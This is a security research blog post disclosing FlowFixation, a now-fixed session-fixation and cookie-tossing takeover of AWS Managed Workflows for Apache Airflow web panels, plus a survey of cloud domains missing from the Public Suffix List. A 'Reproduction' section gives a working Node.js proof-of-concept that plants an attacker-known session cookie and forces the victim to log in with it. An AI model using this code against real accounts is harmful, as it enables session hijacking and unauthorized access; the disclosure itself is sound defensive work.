FlowFixation: AWS Apache Airflow Service Takeover Vulnerability and Why Neglecting Guardrails Puts Major CSPs at Risk
Tenable Research discovered a one-click account takeover vulnerability in the AWS Managed Workflows Apache Airflow service that could have allowed full takeover of a victim’s web management panel of the Airflow instance. The discovery of this now-resolved vulnerability reveals a broader problem of misconfigured shared-parent domains that puts customers of major CSPs at risk.
TL;DR
- Tenable Research discovered a vulnerability we have dubbed FlowFixation that could have allowed a malicious actor to hijack a victim’s session in AWS Managed Workflows for Apache Airflow (MWAA), and that could have resulted in remote code execution (RCE) on the underlying instance, and in lateral movement to other services.
- Additional research revealed that numerous shared-parent service domains in AWS, Azure and GCP were misconfigured, putting cloud customers at considerable risk.
- Some significant risks due to the misconfiguration included cookie tossing, which can lead to session fixation abuse and cross-site request forgery (CSRF) protection bypass; and same-site cookie protection bypass.
- Adding the misconfigured domains to the Public Suffix List (PSL) would have prevented exploitation of FlowFixation and other vulnerabilities including high severity vulnerabilities that others have documented and disclosed.
- A combination of responsible security practices by both cloud providers and cloud customers can minimize many risks associated with shared-parent service domains:
  - While the PSL is an effective guardrail, it’s up to cloud providers to act on this preventive approach.
  - Cloud customers can use a web application scanner such as Tenable’s to protect themselves from some of the aforementioned risks.
The FlowFixation vulnerability
The FlowFixation account-takeover vulnerability, now fixed by Amazon Web Services (AWS), results from a combination of session fixation on the web management panel of AWS Managed Workflows for Apache Airflow (MWAA) and an AWS domain misconfiguration that leads to cookie tossing. By abusing the vulnerability, an attacker could have forced victims to use and authenticate a session known to the attacker. The attacker could then have used the same, now-authenticated session to take over the victim’s web management panel.
FlowFixation highlights a broader issue with the current state of cloud providers’ domain architecture and management as it relates to the Public Suffix List (PSL) and shared-parent domains: same-site attacks. FlowFixation could have been prevented if certain available countermeasures — an important guardrail — had been implemented by AWS.
This blog describes the same-site attack risks inherent in leading cloud environments; the FlowFixation vulnerability case study; and a guardrail that cloud providers can put in place to help prevent such risks.
FlowFixation and same-site attacks in the cloud: Impact
In the case of FlowFixation, upon taking over the victim’s account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGs). Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services.
In the case of same-site attacks, the security impact of the mentioned domain architecture is significant, with heightened risk of such attacks in cloud environments. Among these, cookie-tossing attacks and same-site attribute cookie protection bypass are particularly concerning as both can circumvent CSRF protection. Cookie-tossing attacks can also abuse session-fixation issues.
Same-site attacks and a neglected guardrail
Exposing a much broader problem in which major CSPs are at risk
Background
Many services in cloud environments share the same parent domain. For example, in AWS, Amazon Simple Storage Service (S3), Amazon API Gateway and other services share the “amazonaws.com” domain. This sharing leads to a scenario in which non-related customers host their assets on subdomains of the “amazonaws.com” shared parent domain. The problem is that some assets may also allow client-side code execution as a service.
If we compare it to an on-prem environment, this scenario is like an XSS on a subdomain of a website you do not own. In an on-prem setting you would not normally allow users to run XSS on your subdomain, but in the cloud, allowing this is quite natural. For example, when creating an AWS S3 bucket, you can run client-side code by storing an HTML page in your bucket. The code will run in the context of the S3 bucket subdomain you were granted and also in the context of the shared parent domain, “amazonaws.com.”
I found this risky attack class exists by default in the domain architecture of the three major cloud service providers (CSPs): AWS, Microsoft Azure and Google Cloud Platform (GCP). Let’s look at how and why, and the consequences inherent in this architecture when available countermeasures are absent.
What's the difference between a site and an origin?
Before we explore this new attack class, it is important to first understand the difference between a site and an origin. Here’s an example, using fictitious tenable.com URLs:
https://tenable.com:443
- A site takes into account only the scheme and the registrable parent domain (eTLD+1)
- An origin takes into account the parent domain, scheme, subdomains and the port
Let’s see how this architectural reality can affect cloud services. Amazon API Gateway is a fully managed service that makes it easy for developers to create and secure APIs at any scale. So, for example, my API gateway on https://livs-tenable-gateway.execute-api.eu-central-1.amazonaws.com shares the same site as any other AWS customer whose API gateways are deployed using Amazon API Gateway. Continuing the example, another customer’s website may have the URL: https://victims-gateway.execute-api.us-east1.amazonaws.com
Given that a site considers only the scheme and the parent domain, in the website URLs of the examples above, the scheme (https) and the parent domain (amazonaws.com) are the same. Therefore, both my website and my victim's website share the same site — as noted, very normal in the cloud, very not normal according to on-prem standards.
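The comparison can be sketched in a few lines of JavaScript. This is a simplified illustration, not how browsers implement it: the helper names are made up for this example, and the registrable domain is assumed to be the last two labels of the host, which holds for amazonaws.com but not for suffixes such as co.uk.

```javascript
// Origin = scheme + full host + port (the built-in URL class computes this).
function originOf(url) {
  return new URL(url).origin;
}

// Site = scheme + registrable domain.
// Assumption for this sketch: the registrable domain is the last two host labels.
function naiveSiteOf(url) {
  const u = new URL(url);
  const labels = u.hostname.split('.');
  return `${u.protocol}//${labels.slice(-2).join('.')}`;
}

const mine = 'https://livs-tenable-gateway.execute-api.eu-central-1.amazonaws.com';
const victim = 'https://victims-gateway.execute-api.us-east1.amazonaws.com';

console.log(originOf(mine) === originOf(victim));       // false: the hosts differ
console.log(naiveSiteOf(mine) === naiveSiteOf(victim)); // true: both are https://amazonaws.com
```

The two gateways are separate origins, so the same-origin policy keeps their pages apart, yet they are the same site, which is the level at which cookie scoping decisions are made.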
The problem
The described domain architecture poses the risk of a unique attack class of same-site attacks in the cloud. If the cloud provider has not implemented the necessary guardrail, customers sharing the same site in a cloud service are prone to these kinds of risks or attacks:
- Cookie tossing attacks (supercookie) — CSRF protection bypass, session fixation abuse
- Cookie bombing
- Same-site cookie protection bypass
Beyond the risks that the PSL guardrail addresses, sharing a site can introduce further risks, such as:
- XS-Leaks
- CORS misconfigurations
- Domain relaxation
- Content-Security-Policy bypass
- postMessage abuse
- Same-site browser CVEs
- Cache partitioning, which browsers key by site rather than by origin
While all the above attacks and risks are possible under certain circumstances, cookie tossing is by far the most prevalent. The FlowFixation case study is one example of cookie tossing; two other high-severity vulnerability examples of cookie tossing published by other security researchers are:
- AWS SageMaker - Jupyter Notebook Instance Takeover by Gafnit Amiga
- Cookie Tossing to RCE on Google Cloud JupyterLab by s1r1us
Both cases utilize cookie tossing from the attacker’s subdomain to the victim’s subdomain on the same site to bypass the CSRF protection on the server.
What’s striking is that none of these vulnerabilities could be exploited if the PSL guardrail were in place. The AWS SageMaker and GCP JupyterLab vulnerabilities could have been prevented by inputting the Jupyter Notebooks’ domains in the PSL. The FlowFixation vulnerability could have been prevented by implementing the PSL guardrail presented further below.
Preventing exploitation — the public suffix guardrail
Let’s look at how correctly understanding and managing the public suffix prevents exploitation of this vulnerability.
Understanding the public suffix in internet domains
In the vast expanse of the internet, have you ever come across the term "public suffix" or “eTLD”? A public suffix, also known as an eTLD, is essentially a domain under which individuals can, or once could, register names directly. Think of familiar domain endings like .com, .co.uk or the more unique pvt.k12.ma.us — these are all examples of public suffixes.
Enter the PSL, a comprehensive list that contains all known public suffixes. Mozilla initiated the PSL in the 2000s and it is still thriving, now as a community-powered resource. The inception of the PSL was primarily to cater to the unique requirements of browser developers; today, its utility is recognized in other software environments as well. When a cloud provider adds to the PSL the domains of services in which different customers share a site, browsers treat each added domain as a public suffix. As a result, the associated cloud provider’s services will not be vulnerable to the aforementioned risks.
Research into the current state of PSL among cloud providers
In the cloud, with many cloud services, and different customers sharing a site or parent domain, managing public suffix domains is an important defense-in-depth control. Cloud providers need to ensure that domains are categorized correctly and do not pose risks like those mentioned. It turns out that the efficacy of domain management differs from one cloud provider to the next.
To get a sense of the scope of the problem, I mapped, as best I could, the misconfigured domains of major cloud provider services not specified in the PSL. I focused on services at higher risk of same-site attacks because they use a site that many customers share. It is quite likely that, beyond those I mapped, there are potentially many more misconfigured domains not in the PSL.
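A check of this kind can be sketched as follows. This is not the tooling used in the research, only a minimal illustration under stated assumptions: the PSL text is passed in as a string (the excerpt below is hypothetical, not the real list), rules are read up to the first whitespace, lines starting with "//" are comments, and only exact and "*." wildcard rules are handled (exception rules starting with "!" are ignored).

```javascript
// Parse PSL-formatted text: one rule per line, "//" comment lines and blanks are skipped.
function parseRules(text) {
  return new Set(
    text
      .split('\n')
      .map((line) => line.trim())
      .filter((line) => line && !line.startsWith('//'))
      .map((line) => line.split(/\s+/)[0].toLowerCase())
  );
}

// A domain counts as listed if it appears exactly or is covered by a "*.parent" wildcard rule.
function isListed(domain, rules) {
  const parent = domain.split('.').slice(1).join('.');
  return rules.has(domain) || rules.has(`*.${parent}`);
}

// Hypothetical excerpt for illustration only.
const sample = `
// Hypothetical excerpt, not the real list
com
s3.amazonaws.com
`;

const candidates = ['s3.amazonaws.com', 'airflow.amazonaws.com', 'amplifyapp.com'];
const missing = candidates.filter((d) => !isListed(d, parseRules(sample)));
console.log(missing); // [ 'airflow.amazonaws.com', 'amplifyapp.com' ]
```

Running the same check against a current copy of the list, with the shared service domains of interest as candidates, gives a quick first pass; region-templated domains would need one candidate per region.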
AWS
The main cause of the FlowFixation vulnerability was the session fixation which, as noted, AWS has since fixed. Exploiting the vulnerability was also made possible by the absence of a second layer of defense: the guardrail of the MWAA and API Gateway domains being entered in the PSL by AWS. Since both layers of defense were missing, I was able to abuse these domains and their absence from the PSL by tossing my known session cookie to the shared site of “amazonaws.com.”
To quote Wikipedia on supercookies: “A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com. Supercookies can be a potential security concern and are therefore often blocked by web browsers.”
I found these AWS domains to be misconfigured because they were not present in the PSL:
- sagemaker.aws - Amazon Sagemaker
- amplifyapp.com - AWS Amplify
- airflow.amazonaws.com - Amazon Managed Workflows for Apache Airflow
- execute-api.$region.amazonaws.com - Amazon API Gateway
Due to the nature of AWS domain architecture, it is admittedly hard for AWS to keep up with and add newly created regions to the PSL. For example, the new Israeli region (il-central-1) was initially not in the PSL and therefore was also misconfigured.
Report response
We commend AWS for its collaboration and efforts in addressing the problem. Upon being informed of FlowFixation, the AWS shared parent service domains found to be at risk and our PSL guardrail recommendation, AWS conducted a thorough review of its own and decided to input an even wider range of missing domains to the PSL. In the first fix phase, AWS updated these domains in or added them to the PSL – and intends to add more in the future:
- Amazon API Gateway
- Amazon Cognito
- Amazon EMR
- Amazon Managed Workflows for Apache Airflow
- Amazon S3
- Amazon SageMaker Notebook Instances
- Amazon SageMaker Studio
- Analytics on AWS
- AWS Amplify
- AWS App Runner
- AWS Elastic Beanstalk
A link for the PSL Github pull request by AWS can be found here.
Azure
I found these Azure domains to be misconfigured because they were not present in the PSL:
- azure-api.net - Azure API Management
- azureedge.net - Azure Edge
- azurefd.net - Azure Front Door
- blob.core.windows.net - Azure Blob Storage
- cloudapp.azure.com - Azure Cloud Services and Azure Virtual Machines
- cloudapp.net - Azure Cloud Services and Azure Virtual Machines
- servicebus.windows.net - Azure Service Bus
- trafficmanager.net - Azure Traffic Manager
Report Response
We commend Microsoft Azure for its collaboration and efforts in addressing the problem. Upon being informed of the Azure shared parent service domains found to be at risk and our PSL guardrail recommendation, Azure decided to input to the PSL all the missing domains we had reported to them.
A link for the PSL Github pull request by Azure can be found here.
GCP
I found that “googleusercontent.com” is not in the PSL:
- This domain is the default parent domain of each website hosted on the Google Compute Engine (Virtual Machines)
- The Google Cloud Composer service that hosts Apache Airflow also hosts Apache Airflow on “googleusercontent.com”
- JupyterLab is also hosted in this domain
Report response
Upon being informed of the GCP shared parent service domains found to be at risk and our PSL guardrail recommendation, GCP opted not to fix the issue, saying in a message that it doesn’t consider the issue “severe enough” to track it as a security bug.
FlowFixation vulnerability
Let’s now do a deep dive into the details of the vulnerability. Before doing so, let’s clarify a few important terms.
What is Apache Airflow and what is AWS MWAA?
Apache Airflow is an open-source platform for programmatically authoring, scheduling and monitoring workflows. MWAA is a managed AWS service that simplifies the setup, deployment and scaling of such data workflows. It allows users to build, schedule and monitor their workflows in a managed Apache Airflow without managing the underlying infrastructure.
How common are Apache Airflow and related managed services?
Apache Airflow is one of the most popular orchestration tools, with 12 million downloads per month. A sampling from our research showed that managed services for Apache Airflow are in use by 20% of our customers.
High-level chain components
The FlowFixation attack chain starts with a fairly wide-open door in the form of non-refreshed session cookies.
Session management abuse
The AWS single sign-on (SSO) to Apache Airflow previously did not refresh the session cookie upon login/authentication, and a victim’s unverified session was retrievable without authentication.
Cookies can be set to a parent domain
Like many other AWS services, Apache Airflow is hosted under the parent domain of “.amazonaws.com”. An attacker can publicly host an API Gateway endpoint that acts as the attacker’s website under the same shared parent domain as MWAA, “.amazonaws.com”, and runs the malicious JavaScript.
Since neither domain is listed in the PSL, the attacker can carry out cookie tossing by simply setting the attacker’s known session cookie for the victim’s MWAA web management panel (a subdomain of amazonaws.com) to all shared parent domain subdomains in the victim's browser. This action causes the sharing of the set session cookie with the victim’s MWAA web management panel.
Reaping the rewards
An attacker can force a victim to authenticate to the victim’s own MWAA web management panel using a session known to the attacker and a known SSO redirection URL; the attacker then uses that session to hijack the victim’s Apache Airflow web panel.
Research story deep dive
Apache Airflow Authentication
Each MWAA instance is attached to a web panel for managing workflows, connections, DAGs and more:
The Airflow UI is a management web panel that requires AWS IAM authentication. We can inspect our web panel’s session cookie, which is named “session” and holds a random UUID value:
Notice the Path attribute of the cookie is set to “/” and the domain attribute is set to the specific domain of our web panel. How did we even get this cookie? By proxying the authentication HTTP requests, we can understand how authentication works for the MWAA web panel.
From the AWS web console, we send a security token service (STS)-signed request to the Airflow API with the name of our Airflow environment. In return, we get the JSON Web Token (JWT), named “WebToken”, for our MWAA web panel. The IAM permission that works and is required behind the scenes is airflow:CreateWebLoginToken.
We then get a session cookie through the /aws_mwaa/aws-console-sso?login=true endpoint. The session is retrievable unauthenticated because it is not yet populated. The session will simply not work for authentication without redeeming a JWT with it:
The next step is to redeem our retrieved JWT and session cookie to verify and populate the session as valid so that we are authenticated.
The session cookie can now be used to access the web panel and is verified with the JWT redeem.
Session handling misconfiguration
If we look closely, the last screenshot has a problem: the session cookie we got after redeeming our JWT and authenticating is the exact same session we got before authenticating.
To summarize, the authentication works by retrieving a JWT in return for the user’s STS-signed request; the JWT is then redeemed with a given session cookie for a verified session cookie to authenticate the user. With this in mind, I now know I can get a session cookie for the victim’s web panel that does not require authentication and that the session does not change after logging in.
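The misconfiguration and its usual remedy can be contrasted in a short sketch. This is a generic illustration of session fixation, not the MWAA implementation or the fix AWS shipped (the post does not describe either in code); the in-memory store and all function names are assumptions made for this example.

```javascript
const { randomUUID } = require('crypto');

// Hypothetical in-memory session store: session ID -> { user }
const sessions = new Map();

// Anyone can obtain an empty, unauthenticated session.
function createAnonymousSession() {
  const id = randomUUID();
  sessions.set(id, { user: null });
  return id;
}

// Vulnerable pattern: the pre-login ID is kept and simply marked as authenticated.
function loginKeepingId(id, user) {
  sessions.get(id).user = user;
  return id;
}

// Safer pattern: the pre-login ID is discarded and a fresh one is issued on login.
function loginRegeneratingId(id, user) {
  sessions.delete(id);
  const freshId = randomUUID();
  sessions.set(freshId, { user });
  return freshId;
}

const isAuthenticated = (id) => Boolean(sessions.get(id)?.user);

const fixated = createAnonymousSession();      // ID known to an attacker
loginKeepingId(fixated, 'victim');
console.log(isAuthenticated(fixated));         // true: the attacker's ID is now logged in

const fixatedAgain = createAnonymousSession();
const fresh = loginRegeneratingId(fixatedAgain, 'victim');
console.log(isAuthenticated(fixatedAgain), isAuthenticated(fresh)); // false true
```

With the second pattern, an ID planted before login is worthless afterwards, because the authenticated state is attached to an ID the attacker never saw.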
Abuse idea - cookie tossing and PSL research
What if, by using a redirect from my malicious website, I force the victim to log in with their JWT through the MWAA SSO redirect URL to verify the known session I obtained from their web panel, and then use the verified session to take over the panel?
With the AWS console cookies in their browser, victims who visit the MWAA AWS console SSO-redirect URL will be redirected to their web panel and log in automatically with the flow I just demonstrated.
So the next order of business is to find a way to toss or inject cookies into the victim’s browser, under the domain of their Airflow web panel.
At first, finding such a way seemed straightforward since I know that, as long as I have control over a subdomain of the parent domain, I can set a cookie for the parent domain. Since S3 buckets, just like the Airflow web panel, are hosted on “amazonaws.com”, I tried to set a cookie from my S3 bucket to my Airflow web panel, which was behaving as the victim’s panel. Doing so was as simple as:
document.cookie="session=our-known-retrieved-uuid; Path=/; Domain=.amazonaws.com"
But I noticed the cookie wasn’t set. I quickly understood that the domain attribute was causing the cookie to be rejected, and I guessed it was a public suffix issue. I researched the matter further and found that the domains of S3 buckets are listed in the PSL. However, since the Airflow domain wasn’t in the PSL, I only needed an AWS service that could be publicly exposed and could run code, so that it would behave as the attacker’s website.
I used Google Dorking to find services under the shared parent domain I wanted to test, site:amazonaws.com, and found the API Gateway service to be misconfigured and not in the PSL, so it allowed the setting of cookies to the parent domain:
This service is a perfect setup for the vulnerability since it allows code execution as a service, and I can use it as my attacker website.
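The difference between the S3 attempt and the API Gateway attempt can be modeled with a simplified version of the check browsers apply to a cookie’s Domain attribute. This is a sketch under assumptions, not browser source code: the suffix sets are tiny illustrative stand-ins for the PSL, wildcard and exception rules are not handled, the host names are hypothetical, and the function names are made up for this example.

```javascript
// Longest-match public suffix lookup against a small illustrative rule set.
function publicSuffix(host, suffixes) {
  const labels = host.split('.');
  for (let i = 0; i < labels.length; i++) {
    const candidate = labels.slice(i).join('.');
    if (suffixes.has(candidate)) return candidate;
  }
  return labels[labels.length - 1]; // fallback: treat the last label as the suffix
}

// Registrable domain = public suffix plus one more label (null if host is a suffix).
function registrable(host, suffixes) {
  const suffix = publicSuffix(host, suffixes);
  if (host === suffix) return null;
  const rest = host.slice(0, host.length - suffix.length - 1).split('.');
  return `${rest[rest.length - 1]}.${suffix}`;
}

// Simplified model of whether a page may set a cookie with the given Domain attribute.
function domainAttributeAccepted(pageHost, domainAttr, suffixes) {
  const domain = domainAttr.replace(/^\./, '').toLowerCase();
  const matches = pageHost === domain || pageHost.endsWith(`.${domain}`);
  if (!matches) return false;                                   // must cover the page host
  if (publicSuffix(domain, suffixes) === domain) return false;  // no cookies on a public suffix
  // The page and the cookie domain must share one registrable domain.
  return registrable(pageHost, suffixes) === registrable(domain, suffixes);
}

// State described in the post: S3 is listed, API Gateway is not.
const before = new Set(['com', 's3.amazonaws.com']);
console.log(domainAttributeAccepted('my-bucket.s3.amazonaws.com', '.amazonaws.com', before)); // false
console.log(domainAttributeAccepted('abc123.execute-api.eu-central-1.amazonaws.com', '.amazonaws.com', before)); // true

// Once the API Gateway domain is listed as well, the same toss is rejected.
const after = new Set([...before, 'execute-api.eu-central-1.amazonaws.com']);
console.log(domainAttributeAccepted('abc123.execute-api.eu-central-1.amazonaws.com', '.amazonaws.com', after)); // false
```

In this model, listing a service domain makes every customer subdomain its own registrable domain, so none of them can write cookies for “amazonaws.com” any longer.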
Browser cookie handling obstacle
When injecting my known session cookie I needed to ensure that, when the victim logs in, the browser would use my session rather than the session set by the server. For my injected cookie to take precedence over other cookies with the same name already in the victim’s browser, I could set its path attribute to a deeper path, under “/aws_mwaa/login”. When a browser holds two cookies with the same name that both match a request, it sends both and lists the one with the deeper, more specific path first, so that cookie is the one prioritized.
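The ordering rule comes from RFC 6265, section 5.4: cookies with longer paths are listed before cookies with shorter paths, and ties are broken by earlier creation time. A minimal sketch of that rule follows; the cookie jar layout, the values and the function names are assumptions for illustration, and the path matching is simplified.

```javascript
// Simplified RFC 6265 path match: the cookie path must be a prefix of the
// request path that ends on a "/" boundary.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Build the Cookie header value: longer paths first, then earlier creation time.
function cookieHeader(jar, requestPath) {
  return jar
    .filter((c) => pathMatches(requestPath, c.path))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Hypothetical jar: the server's cookie plus a tossed cookie with a deeper path.
const jar = [
  { name: 'session', value: 'server-issued', path: '/', created: 1 },
  { name: 'session', value: 'attacker-known', path: '/aws_mwaa/login', created: 2 },
];

console.log(cookieHeader(jar, '/aws_mwaa/login'));
// session=attacker-known; session=server-issued
console.log(cookieHeader(jar, '/home'));
// session=server-issued
```

A server that reads only the first “session” value in the header would therefore pick up the tossed cookie on the login path, even though the legitimate cookie was created earlier.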
Technical Exploit Flow
I summarize here the exploit’s entire flow chain for achieving the takeover:
Since any Apache Airflow instance is hosted under the “.amazonaws.com” domain, for example, https://aaaaaaaa5-aef2-443e-aaa-aaaaaaa.c3.eu-central-1.airflow.amazonaws.com, we can host other services in our control that share the same domain and allow us to run our code to facilitate the attack. One of those services is Amazon API Gateway REST API, which we can point to our external server, which holds the exploit code.
The exploit code runs on a victim’s page visit to our REST API, which is also hosted under “.amazonaws.com”, for example: https://a32tasaaeoj.execute-api.eu-central-1.amazonaws.com/
The code sends a valid, unauthenticated request to the /aws_mwaa/aws-console-sso?login=true endpoint of the victim’s web panel, which grants the attacker a new session for the victim’s Apache Airflow web panel. Keep in mind that this session is not yet valid and will not allow the attacker to authenticate at this point.
The client-side code then sets the known obtained session cookie in the victim’s browser under “.amazonaws.com.” This cookie setting is allowed since the attacker’s website is hosted under the API Gateway domain, which shares the parent domain of “.amazonaws.com” with the MWAA service, and also because both subdomains of Airflow and API Gateway were not in the PSL.
For our set cookie to take precedence over other cookies with the same name that are already in the victim’s browser, the code sets the path attribute of the cookie to a deeper path under “/aws_mwaa/login”. As noted, when browsers encounter two cookies with the same name, they use and prioritize the cookie with the deeper/more specific path.
The next step is to redirect the victim to the following URL, to force the victim into logging in to their Apache Airflow web panel: https://eu-central-1.console.aws.amazon.com/mwaa/home?region=eu-central-1#environments/ExampleAirflowName/sso. The victim is automatically redirected to the SSO flow and forced to log in with the session knowingly set by the attacker.
The attacker could then use the known session, which is now authenticated and valid, to take over the victim’s Managed Apache Airflow web portal.
Note: The redirection to the SSO login flow is not mandatory; the attacker could wait and use their injected session cookie at the victim's next login.
Reproduction
These are the steps attackers would have followed to reproduce the vulnerability.
- Run the following Node.js server with node server.js (change all occurrences of “victimsairflow” to the real target)
const http = require('http');
const https = require('https');

const server = http.createServer((req, res) => {
  res.writeHead(200, { 'Content-Type': 'text/html' });

  if (req.method === 'GET' && req.url === '/pocforaws') {
    // Unauthenticated request that returns a fresh, not-yet-populated session
    const options = {
      hostname: 'victimsairflow.c3.eu-central-1.airflow.amazonaws.com',
      path: '/aws_mwaa/aws-console-sso?login=true',
      method: 'GET'
    };

    const externalReq = https.request(options, (externalRes) => {
      const cookies = externalRes.headers['set-cookie'];
      if (!cookies || cookies.length === 0) {
        // Without a Set-Cookie header there is no session value to work with
        console.error('No Set-Cookie header received');
        externalRes.resume();
        res.end('<html><body><h1>No session cookie received</h1></body></html>');
        return;
      }
      console.log('Received Cookies:', cookies);

      // Take the value of the first cookie (name=value; attributes...)
      const cookieValue = cookies[0].split(';')[0].split('=')[1];
      console.log('Extracted Cookie Value:', cookieValue);

      // Drain the response body so that the 'end' event fires
      let responseData = '';
      externalRes.on('data', (data) => {
        responseData += data;
      });

      externalRes.on('end', () => {
        console.log('External request completed');
        // Page served to the visitor: sets the cookie on the shared parent
        // domain with a deeper path, then redirects to the console SSO URL
        const responseHTML = `
          <html>
          <body>
          <p>${cookieValue}</p>
          <script>
          document.cookie = 'session=${cookieValue}; domain=.amazonaws.com; path=/aws_mwaa/login';
          console.log('Cookie set:', document.cookie);
          document.location = 'https://eu-central-1.console.aws.amazon.com/mwaa/home?region=eu-central-1#environments/victimsairflowenvironment/sso';
          </script>
          </body>
          </html>
        `;
        res.end(responseHTML);
      });
    });

    externalReq.on('error', (error) => {
      console.error('Error in external request:', error);
      res.end('<html><body><h1>Error in external request</h1></body></html>');
    });

    console.log('Sending External Request:', options);
    externalReq.end();
  } else {
    res.end('<html></html>');
  }
});

const PORT = 8080;
server.listen(PORT, () => {
  console.log(`Server is running on port ${PORT}`);
});
- Create a new API Gateway REST API, change the response type to text/html and point it to the external Node.js server you hosted.
- Lure the victim into your REST API granted domain under “.amazonaws.com”.
- Use the now-authenticated session cookie you obtained and printed in your Node.js server.
How to identify and protect yourself from the associated risks
A web application scanner can help identify cloud technologies used in web applications and related vulnerabilities. A robust scanner covers some of the mentioned risks associated with shared parent service domains, such as: session fixation and CORS misconfigurations.
Specifically, the Tenable web application scanning solution, Tenable Web App Scanning, provides a comprehensive list of plugins designed to detect cloud services used by web applications and identify common issues, such as data exposure, CI/CD permission controls and SaaS application misconfigurations. The plugins include those with an API focus, which detect insecure API usage in web applications for both representational state transfer (REST) and GraphQL technologies.
The solution adds plugins on a regular basis to cover new cloud web application security risks as they emerge.
Conclusion
The discovery of the FlowFixation vulnerability in AWS’s managed service for Apache Airflow sheds light on critical security concerns within cloud environments. This vulnerability exposed a significant risk in that it allowed attackers to exploit session fixation and cookie tossing to gain unauthorized access to a victim’s web management panel. By infiltrating the Managed Workflows for Apache Airflow (MWAA) web panel, attackers could have potentially compromised the entire instance, leading to unauthorized access to other services, secrets and configurations, and even the execution of malicious code.
Furthermore, the vulnerability highlights a broader issue with CSPs’ domain architecture with respect to shared parent domains and the PSL. The architecture of cloud services, such as AWS, Azure, and GCP, presents a scenario where multiple customers share the same parent domain. This shared architecture poses a considerable risk, enabling attackers to exploit vulnerabilities like same-site attacks, cross-origin issues and cookie tossing, which can lead to unauthorized access, data leaks and code execution.
The importance of the PSL cannot be overstated in mitigating such risks. Proper domain management and inclusion in the PSL are crucial to preventing attackers from exploiting vulnerabilities. Unfortunately, the research reveals that some major cloud providers, such as AWS, Azure, and GCP, have misconfigured domains because they are not listed in the PSL, exposing their customers to vulnerabilities like FlowFixation and other published high-severity vulnerabilities.
As organizations continue to rely on cloud services for their infrastructure and operations, it is imperative that cloud providers prioritize secure domain architecture and actively maintain the PSL. Addressing these misconfigurations and enhancing security measures will contribute to a safer and more resilient cloud environment for businesses and their customers. Cloud customers can also take preventive action and reduce their dependency on the CSP to implement the recommended PSL guardrail by using a web application scanner.
The FlowFixation vulnerability serves as a reminder that a proactive and preventive approach to security is essential in an evolving digital landscape in which the potential for threats is ever-present.
Tenable Cloud Security is here to help
Feel free to contact Tenable Research with any questions or concerns you have about cloud security.